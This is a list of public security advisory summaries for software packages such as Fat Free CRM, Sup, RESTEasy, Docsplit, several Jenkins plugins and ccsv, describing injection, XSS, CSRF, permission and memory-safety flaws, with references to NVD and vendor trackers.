Multiple SQL injection vulnerabilities in app/controllers/home_controller.rb in Fat Free CRM before 0.12.1 allow remote authenticated users to execute arbitrary SQL commands via (1) the homepage timeline feature or (2) the activity feature.
References
…
[fat_free_crm] Fat Free CRM subject to Cross-site Scripting
Multiple cross-site scripting (XSS) vulnerabilities in app/views/layouts/application.html.haml in Fat Free CRM before 0.13.3 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) first name, or (3) last name in a (a) c…
[sup] Sup Code Injection vulnerability
lib/sup/message_chunks.rb in Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the content_type of an email attachment.
References
https://nvd.nist.gov/vuln/detail/CVE-2013…
[org.jboss.resteasy:resteasy-client] JacksonJsonpInterceptor susceptible to cross-site script inclusion (XSSI) attack
JacksonJsonpInterceptor in RESTEasy might allow remote attackers to conduct a cross-site script inclusion (XSSI) attack.
References
https://nvd.nist.gov/vuln/detail/CVE-2016-6348
https://bugzilla.redhat.com/show_bug.cgi?id=1372129
https://github.com/a…
[karteek-docsplit] Karteek Docsplit vulnerable to OS Command Injection
The extract_from_ocr function in lib/docsplit/text_extractor.rb in the Karteek Docsplit (karteek-docsplit) gem 0.5.4 for Ruby allows context-dependent attackers to execute arbitrary commands via shell metacharacters in a PDF filename.
References
https…
[org.jenkins-ci.plugins:pollscm] Jenkins Poll SCM Plugin vulnerable to Cross-Site Request Forgery
Jenkins Poll SCM Plugin was not requiring requests to its API be sent via POST, thereby opening itself to Cross-Site Request Forgery attacks. This allowed attackers to initiate polling of projects with a known name. While Jenkins in general does not co…
[org.jenkins-ci.plugins:docker-commons] Jenkins Docker Commons Plugin allows any user with Overall/Read permission to get list of valid credentials IDs
Docker Commons Plugin provides a list of applicable credential IDs to allow users configuring a job to select the one they’d like to use to authenticate with a Docker Registry. This functionality did not check permissions, allowing any user with Overal…
[org.jenkins-ci.plugins:github-branch-source] Jenkins GitHub Branch Source Plugin vulnerable to Cross-Site Request Forgery
GitHub Branch Source Plugin connects to a user-specified GitHub API URL (e.g. GitHub Enterprise) as part of form validation and completion (e.g. to verify Scan Credentials are correct). This functionality improperly checked permissions, allowing any us…
[ccsv] ccsv Double Free vulnerability
The foreach function in ext/ccsv.c in Ccsv 1.1.0 allows remote attackers to cause a denial of service (double free and application crash) or possibly have unspecified other impact via a crafted file.
References
https://nvd.nist.gov/vuln/detail/CVE-201…
[org.jenkins-ci.plugins:github-branch-source] Jenkins GitHub Branch Source Plugin allows any user with Overall/Read permission to get list of valid credentials IDs
GitHub Branch Source provides a list of applicable credential IDs to allow users configuring a job to select the one they’d like to use. This functionality did not check permissions, allowing any user with Overall/Read permission to get a list of valid…